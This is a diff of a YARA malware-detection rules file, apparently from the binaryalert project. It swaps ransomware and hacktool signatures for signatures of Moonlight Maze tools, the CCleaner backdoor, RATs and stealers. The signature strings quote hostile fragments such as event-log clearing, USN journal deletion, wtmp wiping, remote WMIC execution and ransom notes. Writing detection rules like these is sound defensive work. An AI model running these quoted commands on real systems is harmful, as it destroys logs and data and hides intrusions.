-		$g4 = "dcinst.exe" fullword ascii wide
-		$g5 = "dcrypt.exe" fullword ascii wide
-		$g6 = "you can only use AES to encrypt the boot partition!" ascii wide
+		$a1 = "### PE STORAGE ###" wide ascii
+		$a2 = "### CRYPTO 0 ###" wide ascii
+		$a3 = "### EXTERNAL STORAGE ###" wide ascii
+		$a4 = "### CRYPTO 1 ###" wide ascii
+		$a5 = "### QUEUES ###" wide ascii
+		$a6 = "### TRANSPORT ###" wide ascii
+		$a7 = "### EXECUTION SUBSYSTEM ###" wide ascii
+		$a8 = "### AUTORUN MANAGER ###" wide ascii
+		$a9 = "### INJECT MANAGER ###" wide ascii
+		$a10 = "### LOCAL TRANSPORT MANAGER ###" wide ascii
 
 	condition:
-		2 of ( $u* ) or 4 of ( $g* )
+		6 of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Lazarus_Wannacry : FILE
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Custom_Sniffer
 {
 	meta:
-		description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
-		author = "Costin G. Raiu, Kaspersky Lab"
-		id = "6335bd03-0625-5856-891c-9a5decd7e00f"
+		description = "Rule to detect Moonlight Maze sniffer tools"
+		author = "Kaspersky Lab"
+		id = "a9f005e0-8d73-58ff-b010-d3ce08ffdb64"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://twitter.com/neelmehta/status/864164081116225536"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_lazarus_wannacry.yara#L3-L32"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_custom_sniffer.yara#L1-L20"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "dddff5f74bf3f11baf1d3853d6cb5e5b1e0c5e75445c421d4d5145f7a496fc4b"
+		logic_hash = "466be027f567fe0afc88c82d94e4e0171b4b7d8f38d27a4c4a18cec4ca2b8b2f"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		md5_1 = "9c7c7149387a1c79679a87dd1ba755bc"
-		md5_2 = "ac21c8ad899727137c4b94458d7aa8d8"
+		tags = ""
+		md5_1 = "7b86f40e861705d59f5206c482e1f2a5"
+		md5_2 = "927426b558888ad680829bd34b0ad0e7"
 
 	strings:
-		$a1 = {
-        51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
-        04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01
-        46 56 E8
-        }
-		$a2 = {
-        03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
-        10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
-        30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
-        38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
-        44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
-        68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
-        FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
-        08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
-        10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
-        2B C0 2C C0 FF FE
-        }
+		$a1 = "/var/tmp/gogo" fullword
+		$a2 = "myfilename= |%s|" fullword
+		$a3 = "mypid,mygid=" fullword
+		$a4 = "mypid=|%d| mygid=|%d|" fullword
+		$a5 = "/var/tmp/task" fullword
+		$a6 = "mydevname= |%s|" fullword
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) ) and all of them
+		any of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Petya_Variant_Bitcoin
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Wipe : FILE
 {
 	meta:
-		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE: Bitcoin"
-		author = "@fusionrace"
-		id = "82d6ecc5-7c90-5d50-90ff-f54f8d87685d"
+		description = "Rule to detect log cleaner based on wipe.c"
+		author = "Kaspersky Lab"
+		id = "35060c3d-b805-54a6-a241-eb6e99168fa8"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara#L1-L13"
+		reference = "http://www.afn.org/~afn28925/wipe.c"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_wipe.yara#L3-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "71b6a493388e7d0b40c83ce903bc6b04"
-		logic_hash = "9a5e183aa8e1387e76d5df4e967943b730ba780b6758af3ef23e21bb9e4ce3a6"
+		hash = "e69efc504934551c6a77b525d5343241"
+		logic_hash = "0241d1ca9f5a4d066f7ed2e80bc18ebae3723c6a2364422e31909e8f0e576675"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB" fullword wide
+		$a1 = "ERROR: Unlinking tmp WTMP file."
+		$a2 = "USAGE: wipe [ u|w|l|a ] ...options..."
+		$a3 = "Erase acct entries on tty :   wipe a [username] [tty]"
+		$a4 = "Alter lastlog entry       :   wipe l [username] [tty] [time] [host]"
 
 	condition:
-		$s1
+		( uint32( 0 ) == 0x464c457f ) and ( 2 of them )
 }
-rule BINARYALERT_Ransomware_Windows_Cryptolocker
+rule BINARYALERT_Malware_Windows_Moonlightmaze_IRIX_Exploit_GEN : FILE
 {
 	meta:
-		description = "The CryptoLocker malware propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts files stored on local and mounted network drives"
-		author = "@fusionrace"
-		id = "be205f4b-d078-5437-bacc-203c816db2fa"
+		description = "Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers"
+		author = "Kaspersky Lab"
+		id = "4f9ab7b0-4fb9-5311-ae23-01d0a9e2e104"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://www.secureworks.com/research/cryptolocker-ransomware"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cryptolocker.yara#L1-L21"
+		reference = "https://www.exploit-db.com/exploits/19274/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_IRIX_exploit_GEN.yara#L3-L20"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "012d9088558072bc3103ab5da39ddd54"
-		logic_hash = "317cbc01b4c329befeb5b25478f7827298a26d21b872ae232c519febd9c547fc"
+		logic_hash = "9d55d780c84f2aa4e64c19842b2055ef4bf7c8844ebe622c3942445b06ab8344"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		md5_1 = "008ea82f31f585622353bd47fa1d84be"
+		md5_2 = "a26bad2b79075f454c83203fa00ed50c"
+		md5_3 = "f67fc6e90f05ba13f207c7fdaa8c2cab"
+		md5_4 = "5937db3896cdd8b0beb3df44e509e136"
+		md5_5 = "f4ed5170dcea7e5ba62537d84392b280"
 
 	strings:
-		$u0 = "Paysafecard is an electronic payment method for predominantly online shopping" fullword ascii wide
-		$u1 = "bb to select the method of payment and the currency." fullword ascii wide
-		$u2 = "Where can I purchase a MoneyPak?" fullword ascii wide
-		$u3 = "Ukash is electronic cash and e-commerce brand." fullword ascii wide
-		$u4 = "You have to send below specified amount to Bitcoin address" fullword ascii wide
-		$u5 = "cashU is a prepaid online" fullword ascii wide
-		$u6 = "Your important files \\b encryption" fullword ascii wide
-		$u7 = "Encryption was produced using a \\b unique\\b0  public key" fullword ascii wide
-		$u8 = "then be used to pay online, or loaded on to a prepaid card or eWallet." fullword ascii wide
-		$u9 = "Arabic online gamers and e-commerce buyers." fullword ascii wide
+		$a1 = "stack = 0x%x, targ_addr = 0x%x"
+		$a2 = "execl failed"
 
 	condition:
-		2 of them
+		( uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-rule BINARYALERT_Ransomware_Windows_Cerber_Evasion
+rule BINARYALERT_Ccleaner_Backdoor
 {
 	meta:
-		description = "Cerber Ransomware: Evades detection by machine learning applications"
+		description = "Ccleaner 5.33 backdoor with a possible APT17/Group72 connection."
 		author = "@fusionrace"
-		id = "6e2f44a9-bc0f-5071-9d80-ddfb778cfe5d"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "http://www.darkreading.com/vulnerabilities---threats/cerber-ransomware-now-evades-machine-learning/d/d-id/1328506"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara#L1-L15"
+		id = "769e4fcb-9638-5a5b-8b73-a1cda3bc286a"
+		date = "2017-12-14"
+		modified = "2017-12-14"
+		reference = "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_ccleaner_backdoor.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "bc62b557d48f3501c383f25d014f22df"
-		logic_hash = "43b3b8be5a23b57f6c671abd8491cdc51af1cf3a3fe8a7be308150697cdb92ea"
+		logic_hash = "ce3fc54d58e337ab17e6f1ba7745c593210483c02ed3969059a8fe6682d87218"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "d488e4b61c233293bec2ee09553d3a2f"
+		md5_2 = "b95911a69e49544f9ecc427478eb952f"
+		md5_3 = "063b58879c8197b06d619c3be90506ec"
+		md5_4 = "7690e414e130acf7c962774c05283142"
 
 	strings:
-		$s1 = "38oDr5.vbs" fullword ascii wide
-		$s2 = "8ivq.dll" fullword ascii wide
-		$s3 = "jmsctls_progress32" fullword ascii wide
+		$s1 = "s:\\workspace\\ccleaner\\branches\\v5.33" fullword ascii wide
 
 	condition:
-		all of them
+		$s1
 }
-rule BINARYALERT_Ransomware_Windows_Petya_Variant_2
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Xk_Keylogger
 {
 	meta:
-		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
-		author = "@fusionrace"
-		id = "6401fd7e-5ef7-58b5-b8d3-a63c70e8daa3"
+		description = "Rule to detect Moonlight Maze 'xk' keylogger"
+		author = "Kaspersky Lab"
+		id = "5623021d-0d70-59b3-ae30-522e81552da0"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_2.yara#L1-L17"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_xk_keylogger.yara#L1-L22"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "71b6a493388e7d0b40c83ce903bc6b04"
-		logic_hash = "7e04ffd0423cd1288af5c045bb06930abb732c0ea059e329cafc05faecb4f982"
+		logic_hash = "430027b41aeda9a11dadec2e4d3dd2474852ff3a7656ed7128711a1574e66b8f"
 		score = 75
-		quality = 78
+		quality = 30
 		tags = ""
 
 	strings:
-		$s1 = "dllhost.dat" fullword wide
-		$s2 = "\\\\%ws\\admin$\\%ws" fullword wide
-		$s3 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\"" fullword wide
-		$s4 = "\\\\.\\PhysicalDrive" fullword wide
-		$s5 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip." fullword wide
+		$a1 = "Log ended at => %s"
+		$a2 = "Log started at => %s [pid %d]"
+		$a3 = "/var/tmp/task" fullword
+		$a4 = "/var/tmp/taskhost" fullword
+		$a5 = "my hostname: %s"
+		$a6 = "/var/tmp/tasklog"
+		$a7 = "/var/tmp/.Xtmp01" fullword
+		$a8 = "myfilename=-%s-"
+		$a9 = "/var/tmp/taskpid"
+		$a10 = "mypid=-%d-" fullword
+		$a11 = "/var/tmp/taskgid" fullword
+		$a12 = "mygid=-%d-" fullword
 
 	condition:
-		3 of them
+		3 of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Powerware_Locky
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Encrypted_Keyloger
 {
 	meta:
-		description = "PowerWare Ransomware"
-		author = "@fusionrace"
-		id = "8a1a56af-7a9d-54ed-90b9-daf33735ee1e"
+		description = "Rule to detect Moonlight Maze encrypted keylogger logs"
+		author = "Kaspersky Lab"
+		id = "4f290d77-5cb5-5f07-98fd-1829e2f00e63"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara#L1-L17"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_encrypted_keyloger.yara#L1-L11"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "3433a4da9d8794709630eb06afd2b8c1"
-		logic_hash = "64de34755f706a9fd4c876c473eed4f8922a4450c7ef135b0ab5e49c67363baf"
+		logic_hash = "cdcbe112ae394ce0922647904f70cfae626d413d1770b0e20d2ba49e1f4e2d2d"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = ""
 
 	strings:
-		$s0 = "ScriptRunner.dll" fullword ascii wide
-		$s1 = "ScriptRunner.pdb" fullword ascii wide
-		$s2 = "fixed.ps1" fullword ascii wide
+		$a1 = {47 01 22 2A 6D 3E 39 2C}
 
 	condition:
-		all of them
+		($a1 at 0 )
 }
-rule BINARYALERT_Ransomware_Windows_Petya_Variant_1
+rule BINARYALERT_Malware_Windows_Apt_Red_Leaves_Generic
 {
 	meta:
-		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
-		author = "@fusionrace"
-		id = "bf56c0e4-585c-509b-a182-a93c74be7524"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara#L1-L18"
+		description = "Red Leaves malware, related to APT10"
+		author = "David Cannings"
+		id = "e0067b05-eb4a-52ec-8f35-9336a631f03b"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Red%20Leaves/Source/Red%20Leaves%20technical%20note%20v1.0.md"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_red_leaves_generic.yara#L1-L27"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "71b6a493388e7d0b40c83ce903bc6b04"
-		logic_hash = "3733834ee2271a483739b09c4222d222aa4899cab48fd8fc558bdbd9a66bf2d6"
+		hash = "81df89d6fa0b26cadd4e50ef5350f341"
+		logic_hash = "be03bba9d01e6584b5849514656fd7de866c478f343c0bc618d7dbeda1771696"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "Ooops, your important files are encrypted." fullword ascii wide
-		$s2 = "Send your Bitcoin wallet ID and personal installation key to e-mail" fullword ascii wide
-		$s3 = "wowsmith123456@posteo.net. Your personal installation key:" fullword ascii wide
-		$s4 = "Send $300 worth of Bitcoin to following address:" fullword ascii wide
-		$s5 = "have been encrypted.  Perhaps you are busy looking for a way to recover your" fullword ascii wide
-		$s6 = "need to do is submit the payment and purchase the decryption key." fullword ascii wide
+		$a1 = "Feb 04 2015"
+		$a2 = "I can not start %s"
+		$a3 = "dwConnectPort" fullword
+		$a4 = "dwRemoteLanPort" fullword
+		$a5 = "strRemoteLanAddress" fullword
+		$a6 = "strLocalConnectIp" fullword
+		$a7 = "\\\\.\\pipe\\NamePipe_MoreWindows" wide
+		$a8 = "RedLeavesCMDSimulatorMutex" wide
+		$a9 = "(NT %d.%d Build %d)" wide
+		$a10 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" wide
+		$a11 = "red_autumnal_leaves_dllmain.dll" wide ascii
+		$a12 = "__data" wide
+		$a13 = "__serial" wide
+		$a14 = "__upt" wide
+		$a15 = "__msgid" wide
 
 	condition:
-		any of them
+		7 of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Petya_Variant_3
+rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_3
 {
 	meta:
-		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
+		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
 		author = "@fusionrace"
-		id = "cbf06e62-abe8-54af-b4f4-624ba9233e4b"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara#L1-L13"
+		id = "bdcc0c30-3aa7-5c92-8205-9b360d10ac59"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://securelist.com/introducing-whitebear/81638/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_3.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "71b6a493388e7d0b40c83ce903bc6b04"
-		logic_hash = "4f21b394eb2dd0ebf416b018f438934fdc89cb896701d95b593477fc19abfe48"
+		hash = "b099b82acb860d9a9a571515024b35f0"
+		logic_hash = "955aad2d72407baa7fb71e04b51557649a6f91633f5bdb1a8792e328a1587d23"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "wevtutil cl Setup & wevtutil cl System" fullword wide
-		$s2 = "fsutil usn deletejournal /D %c:" fullword wide
+		$c1 = "{531511FA-190D-5D85-8A4A-279F2F592CC7}" wide ascii
+		$c2 = "IsLoaderAlreadyWork" wide ascii
+		$c3 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%03x%01x-%01x" wide ascii
+		$c4 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%02x%02x-%01x" wide ascii
 
 	condition:
-		any of them
+		all of ( $c* )
 }
-rule BINARYALERT_Hacktool_Multi_Masscan
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki
 {
 	meta:
-		description = "masscan is a performant port scanner, it produces results similar to nmap"
-		author = "@mimeframe"
-		id = "adb2bb07-2a1a-5eb5-8049-b3f8e6cba48a"
+		description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
+		author = "Kaspersky Lab"
+		id = "06eeb6a4-540f-51eb-86f9-4ab49543f645"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/robertdavidgraham/masscan"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_masscan.yara#L1-L17"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki.yara#L1-L27"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "b35e481f73b1c1722056157f8348e2e06bb109c094b948fc6be2d9a7df070a7f"
+		logic_hash = "9a403695ded6ff3626820ba0d4abde7ccd6f3fa6bfd8aa4ceaf0cc009d34c97f"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "14cce7e641d308c3a177a8abb5457019"
+		md5_2 = "a3164d2bbc45fb1eef5fde7eb8b245ea"
+		md5_3 = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
+		md5_4 = "1980958afffb6a9d5a6c73fc1e2795c2"
+		md5_5 = "e59f92aadb6505f29a9f368ab803082e"
 
 	strings:
-		$a1 = "EHLO masscan" fullword wide ascii
-		$a2 = "User-Agent: masscan/" wide ascii
-		$a3 = "/etc/masscan/masscan.conf" fullword wide ascii
-		$b1 = "nmap(%s): unsupported. This code will never do DNS lookups." wide ascii
-		$b2 = "nmap(%s): unsupported, we do timing WAY different than nmap" wide ascii
-		$b3 = "[hint] I've got some local priv escalation 0days that might work" wide ascii
-		$b4 = "[hint] VMware on Macintosh doesn't support masscan" wide ascii
+		$a1 = "Write file Ok..." ascii wide
+		$a2 = "ERROR: Can not open socket...." ascii wide
+		$a3 = "Error in parametrs:" ascii wide
+		$a4 = "Usage: @<get/put> <IP> <PORT> <file>" ascii wide
+		$a5 = "ERROR: Not connect..." ascii wide
+		$a6 = "Connect successful...." ascii wide
+		$a7 = "clnt <%d> rqstd n ll kll" ascii wide
+		$a8 = "clnt <%d> rqstd swap" ascii wide
+		$a9 = "cld nt sgnl prcs grp" ascii wide
+		$a10 = "cld nt sgnl prnt" ascii wide
+		$a11 = "ork error" ascii fullword
 
 	condition:
-		all of ( $a* ) or any of ( $b* )
+		2 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Multi_Jtesta_Ssh_Mitm
+rule BINARYALERT_Malware_Windows_T3Ntman_Crunchrat
 {
 	meta:
-		description = "intercepts ssh connections to capture credentials"
-		author = "@fusionrace"
-		id = "fa8362e2-83d3-5830-8952-502684ad66f9"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/jtesta/ssh-mitm"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_jtesta_ssh_mitm.yara#L1-L12"
+		description = "HTTPS-based Remote Administration Tool (RAT)"
+		author = "@mimeframe"
+		id = "c5b0d183-8822-505a-a1ff-7d6f75a3f174"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/t3ntman/CrunchRAT"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara#L1-L19"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "1d19c83f7d648a0d30074debcd76ff0faf72afa6722251661f8640abdc12a2a9"
-		score = 50
+		logic_hash = "b5216b2b30d22f3d3848e1fb6e4245c558366fb8cd35b70f10fa4e605e211204"
+		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "INTERCEPTED PASSWORD:" wide ascii
-		$a2 = "more sshbuf problems." wide ascii
+		$a1 = "<action>command<action>" wide ascii
+		$a2 = "<action>upload<action>" wide ascii
+		$a3 = "<action>download<action>" wide ascii
+		$a4 = "cmd.exe" wide ascii
+		$a5 = "application/x-www-form-urlencoded" wide ascii
+		$a6 = "&action=" wide ascii
+		$a7 = "&secondary=" wide ascii
+		$a8 = "<secondary>" wide ascii
+		$a9 = "<action>" wide ascii
 
 	condition:
 		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Multi_Ncc_ABPTTS
+rule BINARYALERT_Malware_Windows_Moonlightmaze_U_Logcleaner : FILE
 {
 	meta:
-		description = "Allows for TCP tunneling over HTTP"
-		author = "@mimeframe"
-		id = "dd5f6316-9e51-5cc8-b293-dc33b09cc801"
+		description = "Rule to detect log cleaners based on utclean.c"
+		author = "Kaspersky Lab"
+		id = "2dc1b796-c8fe-5a87-9d6b-3a322f4a43ab"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/nccgroup/ABPTTS"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ncc_ABPTTS.yara#L1-L19"
+		reference = "http://cd.textfiles.com/cuteskunk/Unix-Hacking-Exploits/utclean.c"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_u_logcleaner.yara#L3-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "09874b1d997ac193ad1afa0226f6fb22836c8720c0599d773b18072b92a3acc4"
+		logic_hash = "65fe29075294dfad06f4cca631d5d2f1283c439e9a5913f503fe6e4bb1f5f70a"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		md5_1 = "d98796dcda1443a37b124dbdc041fe3b"
+		md5_2 = "73a518f0a73ab77033121d4191172820"
 
 	strings:
-		$s1 = "---===[[[ A Black Path Toward The Sun ]]]===---" ascii wide
-		$s2 = "https://vulnerableserver/EStatus/" ascii wide
-		$s3 = "Error: no ABPTTS forwarding URL was specified. This utility will now exit." ascii wide
-		$s4 = "tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq" fullword ascii wide
-		$s5 = "63688c4f211155c76f2948ba21ebaf83" fullword ascii wide
-		$s6 = "ABPTTSClient-log.txt" fullword ascii wide
+		$a1 = "Hiding complit...n"
+		$a2 = "usage: %s <username> <fixthings> [hostname]"
+		$a3 = "ls -la %s* ; /bin/cp  ./wtmp.tmp %s; rm  ./wtmp.tmp"
 
 	condition:
-		any of them
+		( uint32( 0 ) == 0x464c457f ) and ( any of them )
 }
-rule BINARYALERT_Hacktool_Multi_Responder_Py
+rule BINARYALERT_Malware_Windows_Pony_Stealer
 {
 	meta:
-		description = "Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server"
-		author = "@fusionrace"
-		id = "82699a67-8ba1-5535-9183-3c857e60134c"
+		description = "Pony stealer malware"
+		author = "@mimeframe"
+		id = "77af81cb-36c7-56a7-bd89-14d79628e5c4"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "http://www.c0d3xpl0it.com/2017/02/compromising-domain-admin-in-internal-pentest.html"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_responder_py.yara#L1-L17"
+		reference = "https://www.knowbe4.com/pony-stealer"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_pony_stealer.yara#L1-L21"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "a99a806b7c578af1f2163583f957db13fa7269c7426666189d85bec2ac87ad4b"
